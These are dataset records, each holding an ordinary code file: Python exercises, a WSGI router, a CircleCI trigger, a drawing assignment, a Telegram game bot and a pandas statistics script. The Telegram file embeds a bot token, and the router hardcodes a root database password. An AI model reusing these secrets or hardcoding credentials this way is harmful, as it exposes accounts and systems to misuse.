+{"seq_id":"64502720","text":"# area of square\n\nclass Areas:\n \n def __init__(self, length, breadth):\n self.length = length\n self.breadth = breadth\n \n def square(self):\n print(self.length*self.length)\n \n def triangle(self):\n self.height = 10\n print(((1/2)*self.length*self.height))\n \n def rectangle(self):\n print(self.length*self.breadth)\n \n def circle(self):\n self.radius = 10\n print(3.142*self.radius*self.radius)\n \n \n def show(self, user):\n self.user = user\n if self.user == 1:\n Areas.square(self)\n \n elif self.user == 2:\n Areas.triangle(self)\n \n elif self.user == 3:\n Areas.rectangle(self)\n \n elif self.user == 4:\n Areas.circle(self)\n \n else:\n print(\"invalid\")\n \ns = Areas(20, 30)\nprint(\"1.square\")\nprint(\"2.triangle\")\nprint(\"3.rectangle\")\nprint(\"4.circle\")\ns.show(int(input(\"enter the option:\")))\n\n","sub_path":"areas.py","file_name":"areas.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"639665320","text":"from datetime import datetime\n\nimport pytest\n\nfrom app.database.dbo.mottak import Metadatafil as Metadatafil_DBO\nfrom app.database.mappers.metadatafil import map_dbo2model\nfrom app.domain.models.Metadatafil import Metadatafil\n\n\n@pytest.fixture\ndef _dbo():\n return Metadatafil_DBO(\n id=1,\n type='xml/mets',\n innhold='innhold',\n filnavn='filnavn',\n opprettet=datetime.fromisoformat('2020-10-13 00:00:00'),\n )\n\n\ndef test_map_dbo2model(_dbo):\n \"\"\"\"\n GIVEN a database object of type Metadatafil\n WHEN calling the method map_dbo2model\n THEN check that the returned domain object Metadatafil is correct\n \"\"\"\n expected = Metadatafil(\n id_=1,\n type_='xml/mets',\n innhold='innhold',\n filnavn='filnavn',\n opprettet=datetime.fromisoformat('2020-10-13 00:00:00'),\n )\n\n actual = map_dbo2model(_dbo)\n\n assert vars(actual) == vars(expected)\n","sub_path":"mottak-arkiv-service/tests/database/mappers/test_metadatafil.py","file_name":"test_metadatafil.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"561093306","text":"#!/usr/bin/python\n\n\"\"\"\n This is the code to accompany the Lesson 3 (decision tree) mini-project.\n\n Use a Decision Tree to identify emails from the Enron corpus by author:\n Sara has label 0\n Chris has label 1\n\"\"\"\nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\n\nskip = False\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\nprint(len(features_train[0]))\n\nif not skip:\n clf = DecisionTreeClassifier(random_state=0)\n t0 = time()\n clf.fit(features_train, labels_train)\n t1 = time()\n predictions = clf.predict(features_test)\n accuracy = accuracy_score(labels_test, predictions)\n print(\"Trainning time {}s with an accuracy of: {}%\".format(round(t1-t0), accuracy*100))\n","sub_path":"decision_tree/dt_author_id.py","file_name":"dt_author_id.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"441333528","text":"#!/usr/bin/env python3.6\n# coding: utf-8\n\"\"\"\ndescription:\n\n\"\"\"\nfrom wsgiref.simple_server import make_server\nimport re\nfrom webob import Response, Request, dec, exc\n\n\nclass Dict2Obj:\n def __init__(self, d: dict):\n self.__dict__[\"_dict\"] = d\n\n def __getattr__(self, item):\n try:\n return self._dict[item]\n except KeyError:\n raise AttributeError(\"Attribute {} not found\".format(item))\n\n def __setattr__(self, key, value):\n raise NotImplementedError\n\n\nclass Context(dict):\n def __getattr__(self, item):\n try:\n return self[item]\n except KeyError:\n raise AttributeError(\"Attribute {} not Found\".format(item))\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\nclass NestedContext(Context):\n def __init__(self, globalcontext: Context = None):\n super().__init__()\n self.relate(globalcontext)\n\n def relate(self, globalcontext: Context = None):\n self.global_context = globalcontext\n\n def __getattr__(self, item):\n if item in self.keys():\n return self[item]\n return self.global_context[item]\n\n\nclass Router:\n TYPECAST = {\n \"str\": str,\n \"word\": str,\n \"int\": int,\n \"float\": float,\n \"ant\": str\n }\n\n TYPE_PATTERN = {\n \"str\": r\"[^/]+\",\n \"word\": r\"\\w+\",\n \"int\": r\"[+-]?\\d+\",\n \"float\": r\"[+-]?\\d+\\.\\d+\",\n \"and\": r\".+\"\n }\n\n PATTERN = re.compile(\"/({[^{}:]+:?[^{}:]*})\")\n\n def transform(self, kv: str):\n name, type_param = kv.strip(\"/{}\").split(\":\")\n return \"/(?P<{}>{})\".format(name, self.TYPE_PATTERN.get(type_param, \"\\w+\")), name, self.TYPECAST.get(type_param,\n str)\n\n def parse(self, src: str):\n start = 0\n res = \"\"\n translator = {}\n while True:\n matcher = self.PATTERN.search(src, start)\n if matcher:\n res += matcher.string[start:matcher.start()]\n tmp = self.transform(matcher.string[matcher.start():matcher.end()])\n # : ('/(?[^/]+)', 'name', )\n res += tmp[0]\n translator[tmp[1]] = tmp[2]\n start = matcher.end()\n else:\n break\n if res:\n return res, translator\n else:\n return src, translator\n\n def __init__(self, prefix: str = \"\"):\n self.__prefix = prefix.rstrip(\"/\\\\\")\n self.__route_table = []\n self.pre_intercepter = []\n self.post_intercepter = []\n self.ctx = NestedContext()\n\n @property\n def prefix(self):\n return self.__prefix\n\n def register_preintercepter(self, fn):\n self.pre_intercepter.append(fn)\n return\n\n def register_postintercepter(self, fn):\n self.post_intercepter.append(fn)\n return fn\n\n def route(self, rule, *method):\n def wrapper(handler):\n pattern, translator = self.parse(rule)\n self.__route_table.append((method, re.compile(pattern), translator, handler))\n return handler\n\n return wrapper\n\n def get(self, pattern):\n return self.route(pattern, \"GET\") # 加了一个参数已经形成调用条件了\n\n def post(self, pattern):\n return self.route(pattern, \"POST\")\n\n def match(self, request: Request):\n if not request.path.startswith(self.prefix): # 减少嵌套层次\n return\n for fn in self.pre_intercepter:\n request = fn(self.ctx, request)\n for methods, pattern, translator, handler in self.__route_table:\n if not methods or request.method.upper() in methods:\n matcher = pattern.match(request.path.replace(self.prefix, \"\")) # pattern 是prefix后面的所以匹配的字符串也需要去掉prefix\n if matcher:\n new_dict = {}\n for k, v in matcher.groupdict().items():\n new_dict[k] = translator[k](v)\n request.kwargs = Dict2Obj(new_dict) # request.kwargs.k -> k可以直接访问\n response = handler(request)\n for fn in self.post_intercepter:\n response = fn(self.ctx, request, response)\n return response\n\n\nclass Application:\n ctx = Context()\n\n def __init__(self, **kwargs):\n self.ctx.app = self\n for k, v in kwargs:\n self.ctx[k] = v\n\n ROUTERs = []\n\n PRE_INTERCEPTER = []\n\n POST_INTERCEPTER = []\n\n @classmethod\n def register_preintercepter(cls, fn):\n cls.PRE_INTERCEPTER.append(fn)\n return fn\n\n @classmethod\n def register_postintercepter(cls, fn):\n cls.POST_INTERCEPTER.append(fn)\n return fn\n\n @classmethod\n def register(cls, router: Router):\n router.ctx.relate(cls.ctx)\n router.ctx.router = router\n cls.ROUTERs.append(router)\n\n @dec.wsgify\n def __call__(self, request: Request):\n for fn in self.PRE_INTERCEPTER:\n request = fn(self.ctx, request)\n for router in self.ROUTERs:\n response = router.match(request)\n for fn in self.POST_INTERCEPTER:\n response = fn(self.ctx, request, response)\n if response: # handler(request) 返回的就是处理好的对象,直接抛给浏览器\n return response\n raise exc.HTTPNotFound(\"wrongpage\")\n\n\nidx = Router() # prefix根\n# id1 = Router() # prefix根\npy = Router(\"/python\") # prefix python\nApplication.register(idx) # prefix注册,前缀应用名很少,所以这个是可以定义有限个很少..\nApplication.register(py) # 路由对象已经注册到应用中的类属性了,\n\n\n@idx.get(\"^/$\")\ndef index(request: Request): # index = idx.get(\"^/$\")(index) ->index = idx.route(self, rule, *method)(index)\n res = Response()\n res.status_code = 200\n # res.content_type=\"text/html\"\n print(request)\n res.text = \"luckynginx\"\n return res\n\n\n@idx.get(\"/{id:int}\")\ndef index1(request: Request): # index = idx.get(\"^/$\")(index) ->index = idx.route(self, rule, *method)(index)\n res = Response()\n res.status_code = 200\n # res.content_type=\"text/html\"\n print(request)\n res.text = \"luckynginx->{}\".format(request.kwargs.id)\n return res\n\n\n@idx.get(\"^/python$\")\ndef index(request: Request):\n res = Response()\n res.status_code = 200\n print(request)\n # res.content_type=\"text/html\"\n res.text = \"luckynginx_python\"\n return res\n\n\n# @py.route(\"^/(\\w+)$\")\n# def show_python(request: Request):\n# print(request)\n# res = Response()\n# res.text = \"ma_ge to python\"\n# return res\n\n\n@py.route(\"/{product:str}\")\ndef show_python_product(request: Request):\n print(request)\n res = Response()\n res.text = \"product no.{}\".format(request.kwargs.product)\n return res\n\n\n@Application.register_preintercepter\ndef show_headers(ctx: Context, request: Request):\n print(ctx.items())\n print(request.path, \"Paaaaaaaaaaaaaaaath\")\n print(request.user_agent, \"agentttttttttttt\")\n return request\n\n\n@py.register_preintercepter\ndef show_prefix(ctx: Context, request: Request):\n print(\"_____________prefix = {}\".format(ctx.router.prefix))\n return request\n\n\nif __name__ == '__main__':\n from 数据库连接.仿orm框架.conpool import ConnPoo\n httpd = make_server('0.0.0.0', 8000, Application( ))\n try:\n pool = ConnPoo(3,\"172.16.101.56\",\"root\",\"123456\",\"test\")\n with pool as cursor:\n with cursor:\n cursor.execute(\"select * from salaries\")\n for i in cursor:\n print(i)\n httpd.serve_forever()\n\n except KeyboardInterrupt:\n httpd.shutdown()\n httpd.server_close()\n","sub_path":"wsgi_server/webob_app_router_newdict_intercepter.py","file_name":"webob_app_router_newdict_intercepter.py","file_ext":"py","file_size_in_byte":7922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"612655795","text":"from building import *\nImport('rtconfig')\n\nsrc = []\ncwd = GetCurrentDir()\n\nsrc = Glob('*.c')\nsrc += Glob('src/*.c')\n\n\n# add ds18b20 include path.\npath = [cwd + '/inc']\n\n# add src and include to group.\ngroup = DefineGroup('pcap', src, depend = [''], CPPPATH = path)\nReturn('group')","sub_path":"packages/pcap/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"30463872","text":"#!/usr/bin/env python3\n\"\"\"\nTriggers an ad-hoc job in CircleCI with temporary environment variables set, via their v1.1 API\n\"\"\"\n\nimport argparse\nimport os\nimport requests\nimport json\nimport sys\nimport urllib\n\n\ndef trigger_circleci_build(job_args, github_owner, github_repo, git_branch, circle_token):\n \"\"\"Triggers a CircleCI job with temporary environment variables\"\"\"\n\n url = \"https://circleci.com/api/v1.1/project/github/%s/%s/tree/%s?circle-token=%s\" % (github_owner, github_repo, urllib.parse.quote_plus(git_branch), circle_token)\n payload = { 'build_parameters': job_args }\n\n response = requests.post(url, json=payload)\n response.raise_for_status()\n\n\ndef main():\n \"\"\"Triggers a CircleCI job from the CLI\"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--repo', required=True)\n parser.add_argument('--branch', required=True)\n parser.add_argument('--circle-job', required=True)\n args = parser.parse_args()\n github_owner=os.environ['GITHUB_OWNER']\n circle_token=os.environ['CIRCLECI_TOKEN']\n\n job_args = {}\n for key in os.environ:\n if key.startswith(\"CIRCLECI_JOB_ENV_\"):\n job_args[key.lstrip(\"CIRCLECI_JOB_ENV_\")] = os.environ[key]\n\n job_args['CIRCLE_JOB'] = args.circle_job\n trigger_circleci_build(job_args, github_owner, args.repo, args.branch, circle_token)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"trigger_circleci_job.py","file_name":"trigger_circleci_job.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"650012292","text":"# Brian Mar\r\n# CSC 110\r\n# Section 05\r\n# April 24,2013\r\n# Assignment 3\r\n\r\n# This program is a modified version of TreeTest3.py file that adds high-level\r\n# design elements to make a total of 12 high-level elements. The TreeTest3.py\r\n# was modified to fulfill requirements for Assignment #3.\r\n\r\n\r\n# TreeTest3.py\r\n# This sample program demonstrates drawing shapes\r\n# on a canvas using some Gui tools.\r\n#\r\n# Study the program GuiTest3.py before working with this program.\r\n#\r\n# This program is not interactive. It draws the same\r\n# picture every time it is executed.\r\n#\r\n# To run this program, you must save the file Gui3.py\r\n# in the same folder as this program.\r\n#\r\n# CSC 110\r\n# W'13 (Python 3 version)\r\n\r\n# Required import statement for Gui tools\r\nimport Gui3\r\n\r\n# Named Constants \r\nCANVAS_WIDTH = 640\r\nCANVAS_HEIGHT = 480\r\n\r\n# Function Definition Section\r\n\r\n# Draws one tree. The parmeters base_x and base_y specify\r\n# the location of a point at the center of the bottom edge\r\n# of the tree trunk. The last parameter is the height of\r\n# the tree. All parameters have units of pixels.\r\ndef draw_simple_tree(base_x, base_y, height):\r\n    # draw trunk\r\n    trunk_x1 = base_x - height * 0.05\r\n    trunk_x2 = base_x + height * 0.05\r\n    trunk_y1 = base_y\r\n    trunk_y2 = base_y + height * 0.5\r\n    canvas.rectangle([[trunk_x1, trunk_y1], [trunk_x2, trunk_y2]], \\\r\n                     fill='brown', width = 0)\r\n    # draw crown\r\n    # the polygon has 3 points, peak, lower left (LL), and lower right (LR)\r\n    LL_x = base_x - height * 0.2\r\n    LR_x = base_x + height * 0.2\r\n    L_y = base_y + height * 0.3\r\n    canvas.polygon([[base_x, base_y + height], [LL_x, L_y], [LR_x, L_y]], \\\r\n                   fill='darkgreen', width=0)\r\n\r\n# Draws a cluster of three trees. The parmeters x and y specify\r\n# the location of a point at the center of the bottom edge\r\n# of the tree trunk of the largest tree in the cluster.\r\n# The last parameter is the \"size\" of the cluster -- the distance\r\n# in pixels from the bottom to the top of the cluster.\r\ndef draw_tree_cluster(x, y, size):\r\n    draw_simple_tree(x - size * 0.15, y + size * 0.5, size * 0.5)\r\n    draw_simple_tree(x - size * 0.3, y + size * 0.3, size * 0.6)\r\n    draw_simple_tree(x, y, size * 0.8)\r\n\r\n# Draws a snowman made up of 3 circles. The parameters x and y specify\r\n# the location of the center point of the circle. The last parameter is\r\n# \"h\" which is the height of the snowman\r\ndef draw_snowman(cx, cy, h):\r\n    # Draws the head,middle, and lower body\r\n    canvas.circle ([cx, cy + h * (85/125)], h * (15/125), \\\r\n                   fill = 'white')\r\n    canvas.circle ([cx, cy + h * (50/125)], h * (20/125), fill = 'white')\r\n    canvas.circle([cx, cy], h * (30/125), fill = 'white')\r\n    # Eyes\r\n    canvas.circle([cx + h * (7.5/125), cy + h * (92.5/125)], h * (2/125), \\\r\n                  fill = 'black')\r\n    canvas.circle([cx - h * (7.5/125), cy + h * (92.5/125)], h * (2/125), \\\r\n                  fill = 'black')\r\n    # Nose\r\n    canvas.polygon([[cx - h * (3.75/125), cy + h * (80/125)] \\\r\n                    , [cx + h * (3.75/125), cy + h * (80/125)] \\\r\n                    , [cx, cy + h * (88.75/125)]], fill = 'blue', width =0)\r\n    # Mouth\r\n    canvas.line([[cx + h * (5/125), cy + h * (75/125)]\\\r\n                 ,[cx - h * (5/125), cy + h * (75/125)]], fill='red', width=2)\r\n    # Buttons\r\n    canvas.circle ([cx, cy + h * (50/125)], h * (2/125), \\\r\n                   fill = 'green')\r\n    canvas.circle ([cx, cy + h * (40/125)], h * (2/125), \\\r\n                   fill = 'green')\r\n    canvas.circle ([cx, cy + h * (60/125)], h * (2/125), \\\r\n                   fill = 'green')\r\n\r\n# Draws a sun made up of 1 circles in the corner. The parameters x and y specify\r\n# the location of the center point of the circle. The last parameter is\r\n# \"r\" which is the radius of the circle\r\ndef draw_sun(x,y,r):\r\n    canvas.circle([x, y], r, fill = 'yellow')\r\n    canvas.line([[x - r * (8/60), y - r * (60/60)]\\\r\n                 , [x - r * (20/60), y - r * (100/60)]])\r\n    canvas.line([[x - r * (40/60), y - r * (45/60)]\\\r\n                 , [x - r * (60/60), y - r * (80/60)]])\r\n    canvas.line([[x - r * (60/60), y - r * (10/60)]\\\r\n                 , [x - r * (90/60), y - r * (40/60)]])\r\n    \r\n# Draws a cloud made up of circles. The parameters x and y specify\r\n# the location of the center point of the circle. The last parameter is\r\n# \"r\" which is the radius of the circle\r\ndef draw_cloud(x,y,ch):\r\n    canvas.oval([[x + ch * (15/120),y + ch * (5/120)] \\\r\n                 ,[x + ch * (85/120), y - ch * (25/120)]] \\\r\n                , fill= 'blue', width = 0)\r\n    canvas.circle([x,y], ch * (30/120), fill= 'blue', width = 0)\r\n    canvas.circle([x + ch * (30/120), y + ch * (20/120)] \\\r\n                  , ch * (22/120), fill= 'blue', width = 0)\r\n    canvas.circle([x + ch * (60/120), y + ch * (20/120)], ch * (20/120) \\\r\n                  , fill= 'blue', width = 0)\r\n    canvas.circle([x + ch * (85/120), y + ch * (10/120)], ch * (20/120) \\\r\n                  , fill = 'blue', width = 0)\r\n    canvas.circle([x + ch * (95/120), y - ch * (15/120)], ch * (20/120) \\\r\n                  , fill= 'blue', width = 0)\r\n    canvas.oval([[x,y],[x + ch * (90/120), y - ch * (45/120)]] \\\r\n                ,fill= 'blue', width = 0)\r\n\r\n#Draws a house based on x as the x-central point, y as the y-central point\r\n#and h as the height of the house. These three parameters help build the house.\r\ndef draw_house(x,y,h):\r\n    canvas.rectangle([[x - h * (40/160), y + h * (40/160)] \\\r\n                      , [x + h * (40/160), y - h * (40/160)]], fill = 'red' \\\r\n                     , width = 0)\r\n    canvas.oval([[x + h * (20/160), y + h * (100/160)] \\\r\n                 , [x + h * (60/160), y + h * (75/160)]], fill = 'gray' \\\r\n                , width = 0) \r\n    canvas.rectangle([[x + h * (20/160), y + h * (40/160)] \\\r\n                      , [x + h * (40/160), y + h * (80/160)]], fill = 'brown' \\\r\n                     , width = 0) \r\n    canvas.polygon([[x - h * (40/160), y + h * (40/160)], [x, y + h * (80/160)] \\\r\n                    ,[x + h * (40/160), y + h * (40/160)]], fill = 'black' \\\r\n                   , width = 0)\r\n    \r\n\r\ndef main():\r\n    # draw things on the canvas\r\n    draw_tree_cluster(0, 0, 50)\r\n    draw_tree_cluster(-40, -30, 65)\r\n    draw_tree_cluster(60, -120 , 120)\r\n    draw_simple_tree(-80, -150, 140)\r\n    draw_simple_tree(-100, -180, 160)\r\n    draw_snowman(240, -160, 125)\r\n    draw_snowman(180, -50, 75)\r\n    draw_sun(320, 240, 60)\r\n    draw_cloud(-240, 180, 120)\r\n    draw_cloud(-70, 160, 100)\r\n    draw_cloud(120, 180, 75)\r\n    draw_house(-200, -20, 160)\r\n    draw_house(0, -200, 90)\r\n    \r\n\r\n#####################################################################\r\n#\r\n# DO NOT CHANGE ANYTHING BELOW THIS LINE\r\n#\r\n#####################################################################\r\n\r\n# Setup the canvas -- canvas is the drawing area\r\n# Note that 'win' and 'canvas' are GLOBAL VARIABLES in this program\r\nwin = Gui3.Gui()\r\nwin.title('Playing around with Gui')\r\ncanvas = win.ca(width = CANVAS_WIDTH, height = CANVAS_HEIGHT)\r\n\r\n# run the main function\r\nmain()\r\n\r\n# show the window\r\nwin.mainloop()\r\n\r\n# Here are some colors you can use: 'white', 'gray', 'black', 'red',\r\n# 'green', 'blue', 'cyan', 'yellow', 'magenta', 'brown', 'darkgreen'\r\n# Hundreds of colors here: http://tmml.sourceforge.net/doc/tk/colors.html\r\n\r\n","sub_path":"Assignments/Assignment 3.py","file_name":"Assignment 3.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"439655690","text":"from telegram.ext import Updater, CommandHandler\nfrom telegram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton\n\nimport logging\nimport random\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\nserver_updater = Updater(token='507313417:AAGRTVRJJ6hA_c_TXZzM-x3bIz4jNV-MWqA')\ndispatcher = server_updater.dispatcher\n\n\nfrom functools import wraps\n\nBOT_LINK = \"http://t.me/clue_test_bot\"\n\ndef group_only(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n print(\"In wrapper\")\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n\n if user_id == chat_id:\n bot.send_message(chat_id=update.message.chat_id, text=\"You can post this command only from game group\")\n return\n return func(bot, update, *args, **kwargs)\n return wrapped\n\ndef user_only(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n\n if user_id != chat_id:\n bot.send_message(chat_id=update.message.chat_id, text=\"In order to post this command you must address the bot directly.\\nTry resending in %s\" % (BOT_LINK))\n return\n return func(bot, update, *args, **kwargs)\n return wrapped\n\n\n\nupdate_history = []\ndef test(bot, update):\n update_history.append(update)\n updates = bot.get_updates()\n print(\"Starting\")\n print([u.message.text for u in updates]) \n bot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\ndispatcher.add_handler(CommandHandler('test', test))\n\n@group_only\ndef intro(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"Hello everybody. Welcome to `THE CLUE`. Please everybody say /hi\")\n\n\nactive_users = {}\ntools = [\"Hose\", \"Club\", \"Sword\"]\nrooms = [\"Badroom\", \"Kitchen\", \"Closets\"]\nmurder_info = None \n\n@group_only\ndef register_user(bot, update):\n fullname = update.effective_user.full_name\n uid = update.effective_user.id \n bot.send_message(chat_id=update.message.chat_id, text=\"Hi, %s, welcome to our little game\" % (fullname) )\n active_users[uid] = fullname\n\n@group_only\ndef make_murder(bot, update):\n #TODO: kill works onlu once a game. \n global murder_info\n murder_info = (random.choice(tools), random.choice(rooms), random.choice(list(active_users.keys())))\n text = \"Someone commited a murder! Alas! \\nHe used one of the follwing tools:\\n\\t\\t{0} \\n\" \\\n \"It was in room:\\n\\t\\t{1} \\n\" \\\n \"And the murdrer might be...\\n\\t\\t{2}\".format(\"\\n\\t\\t\".join(tools),\"\\n\\t\\t\".join(rooms),\"\\n\\t\\t\".join(active_users.values()))\n bot.send_message(chat_id=update.message.chat_id, text=text)\n bot.send_message(chat_id=update.message.chat_id, text=\"In order to guess, send me /guess privatly.\")\n\nreply_keyboard = [['Age', 'Favourite colour'],\n ['Number of siblings', 'Something else...'],\n ['Done']]\nmarkup = ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)\n\n@user_only\ndef guess(bot, update):\n print(update.message.chat_id ,update.effective_user.id)\n if update.message.chat_id == update.effective_user.id:\n if not update.effective_user.id in active_users:\n bot.send_message(chat_id=update.message.chat_id, text=\"I don't know you. Please join a game\")\n update.message.reply_text(\n \"Hi! My name is Doctor Botter. I will hold a more complex conversation with you. \"\n \"Why don't you tell me something about yourself?\",\n reply_markup=markup)\n else:\n bot.send_message(chat_id=update.message.chat_id, text=\"In order to make a guess, send me a private message at {0}\".format(BOT_LINK))\n\n@group_only\ndef endgame(bot, update):\n pass #TODO: implement\n\ndispatcher.add_handler(CommandHandler('intro', intro))\ndispatcher.add_handler(CommandHandler('hi', register_user))\ndispatcher.add_handler(CommandHandler('kill', make_murder))\ndispatcher.add_handler(CommandHandler('guess', guess))\n\nserver_updater.start_polling()\nserver_updater.idle()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"440808771","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nimport pandas\r\nimport json\r\n\r\n# df = pandas.read_csv('sid_info_test.csv')\r\ndf = pandas.read_csv('sid_info_new.csv')\r\ndf = df.drop('Unnamed: 16', 1)\r\n\r\n\r\ndf.columns = [u'sid', u'tel', u'province', u'city',\r\n u'telecom', u'crawler_channel', u'crawl_status', u'crawl_msg',\r\n u'login_status', u'login_msg', u'report_status', u'report_msg',\r\n u'start_time', u'login_time', u'end_time', u'report_create_time']\r\n\r\n\r\n# print df.columns\r\n# print df.tail()\r\n# print df.groupby('telecom')['telecom'].count()\r\n# print df.groupby('telecom')['login_status']\r\n\r\n # print total_each\r\n # print login_true_each, login_true_pct\r\n # print crawl_true_each, crawl_true_pct\r\n # print report_true_each, report_true_pct\r\n # exit()\r\n# 数据格式化\r\ndf['login_used'] = df['login_time'] - df['start_time']\r\ndf['crawl_used'] = df['end_time'] - df['login_time']\r\ndf['report_used'] = df['report_create_time'] - df['end_time']\r\ndf['crawler_channel'] = df['crawler_channel'].fillna('yulore')\r\ndf['province'] = df['province'].fillna('未知')\r\ndf['city'] = df['city'].fillna('未知')\r\n\r\n# print df.loc[(~(df.login_status.isin([0]) )) & (df.crawler_channel == 'xinde')]\r\n# print df.groupby('crawler_channel')['crawler_channel'].count()\r\n# df = df.fillna(-99)\r\n\r\ndef get_stats(df):\r\n total = df.shape[0]\r\n login_true = df.loc[df.login_status == 0].shape[0]\r\n crawl_true = df.loc[(df.login_status == 0) & (df.crawl_status == 0)].shape[0]\r\n report_true = df.loc[(df.login_status == 0) & (df.crawl_status == 0) & (df.report_status == 0)].shape[0]\r\n login_true_pct = login_true*100.0/total\r\n crawl_true_pct = crawl_true*100.0/login_true\r\n report_true_pct = report_true*100.0/crawl_true\r\n # print login_true, crawl_true, report_true, report_true_pct\r\n return {\r\n \"total\": total,\r\n \"login_true\": login_true,\r\n \"login_true_pct\": login_true_pct,\r\n \"crawl_true\": crawl_true,\r\n \"crawl_true_pct\": crawl_true_pct,\r\n \"report_true\": report_true,\r\n \"report_true_pct\": report_true_pct,\r\n }\r\n\r\ndef groupd_stats(df, groupd=None):\r\n data_list = list()\r\n if len(groupd) == 1:\r\n for k1,group in df.groupby(groupd):\r\n # print k1\r\n stats_dict = get_stats(group)\r\n stats_dict.update({groupd[0]: k1})\r\n data_list.append(stats_dict)\r\n elif len(groupd) == 2:\r\n for (k1,k2),group in df.groupby(groupd):\r\n # print k1,k2\r\n stats_dict = get_stats(group)\r\n stats_dict.update({groupd[0]: k1, groupd[1]: k2})\r\n data_list.append(stats_dict)\r\n elif len(groupd) == 3:\r\n for (k1,k2,k3),group in df.groupby(groupd):\r\n # print k1,k2,k3\r\n stats_dict = get_stats(group)\r\n stats_dict.update({groupd[0]: k1, groupd[1]: k2, groupd[2]: k3})\r\n data_list.append(stats_dict)\r\n return sorted(data_list, key=lambda k: k.get('total', 0), reverse=True)\r\n\r\n# 总览\r\nall_stats = get_stats(df)\r\n# print all_stats\r\n\r\n# 运营商\r\ncxcc_stats = groupd_stats(df, groupd=['telecom'])\r\n# print cxcc_stats\r\n\r\n# 运营商,地区\r\nprov_cxcc_stats = groupd_stats(df, groupd=['province', 'telecom'])\r\n# print prov_cxcc_stats\r\n\r\n# 渠道\r\nchannel_stats = groupd_stats(df, groupd=['crawler_channel'])\r\n# print channel_stats\r\n\r\n# 运营商,渠道\r\nchannel_cxcc_stats = groupd_stats(df, groupd=['crawler_channel', 'telecom'])\r\n# print channel_cxcc_stats\r\n\r\n# 运营商,地区,渠道\r\nchannel_prov_cxcc_stats = groupd_stats(df, groupd=['crawler_channel', 'province', 'telecom'])\r\n# print channel_prov_cxcc_stats\r\n\r\n\r\n# 失败原因分析\r\nimport operator\r\nerror_dict = df.groupby('crawl_status')['crawl_status'].count().sort_values(ascending=False).to_dict()\r\nerror_list = sorted(error_dict.items(), key=operator.itemgetter(1), reverse=True)\r\n# print error_list,len(error_list)\r\n\r\n# exit()\r\n\r\ndf = df.loc[(df.login_used >= 1) & (df.crawl_used >= 1) & (df.crawl_used <= 300) & ( df.report_used >= 1) & (df.report_used <= 140)]\r\n\r\n# 耗时\r\ndef used_stats(df, pattern='crawl_used'):\r\n used_min = df[pattern].min()\r\n used_max = df[pattern].max()\r\n used_mean = df[pattern].mean()\r\n used_75 = df[pattern].quantile(0.75)\r\n used_98 = df[pattern].quantile(0.98)\r\n return {\r\n \"used_min\": used_min,\r\n \"used_max\": used_max,\r\n \"used_mean\": used_mean,\r\n \"used_75\": used_75,\r\n \"used_98\": used_98,\r\n }\r\n# 授权耗时\r\n# print df.loc[df.report_used >= 200].count()\r\nlogin_used = used_stats(df, pattern='login_used')\r\n# print login_used\r\n\r\n# 爬取耗时\r\ncrawl_used = used_stats(df)\r\n# print crawl_used\r\n\r\n# 报告耗时\r\nreport_used = used_stats(df, pattern='report_used')\r\n# print report_used\r\n\r\ndata = {\r\n 'all_stats':all_stats,\r\n 'cxcc_stats':cxcc_stats,\r\n 'prov_cxcc_stats':prov_cxcc_stats,\r\n 'channel_stats':channel_stats,\r\n 'channel_cxcc_stats':channel_cxcc_stats,\r\n 'channel_prov_cxcc_stats':channel_prov_cxcc_stats,\r\n 'error_list':error_list,\r\n 'login_used':login_used,\r\n 'crawl_used':crawl_used,\r\n 'report_used':report_used,\r\n}\r\n\r\nwith open('stats.json', 'w') as fp:\r\n json.dump(data, fp, indent=4, sort_keys=True, ensure_ascii=False)\r\n\r\n# print df.crawl_used.quantile([0.0, .99])\r\n# crawl_groupd = df.groupby('crawl_used')['crawl_used'].count().to_dict()\r\n# report_groupd = df.groupby('report_used')['report_used'].count().to_dict()\r\n# print report_groupd\r\n# login_used_list = df.login_used.tolist()\r\n# crawl_used_list = df.crawl_used.tolist()\r\n# report_used_list = df.report_used.tolist()\r\n#\r\n# print sorted(login_used_list)[-5:]\r\n# print sorted(crawl_used_list)[-5:]\r\n# print sorted(report_used_list)[-5:]\r\n# with open('tongji.txt', 'w') as fp:\r\n# json.dump(crawl_groupd, fp, indent=4, sort_keys=True)\r\n# print df.crawl_used.tolist()\r\n# print df.report_used.tolist()\r\n# print df.login_used.mean()\r\n# print df.crawl_used.mean()\r\n# print 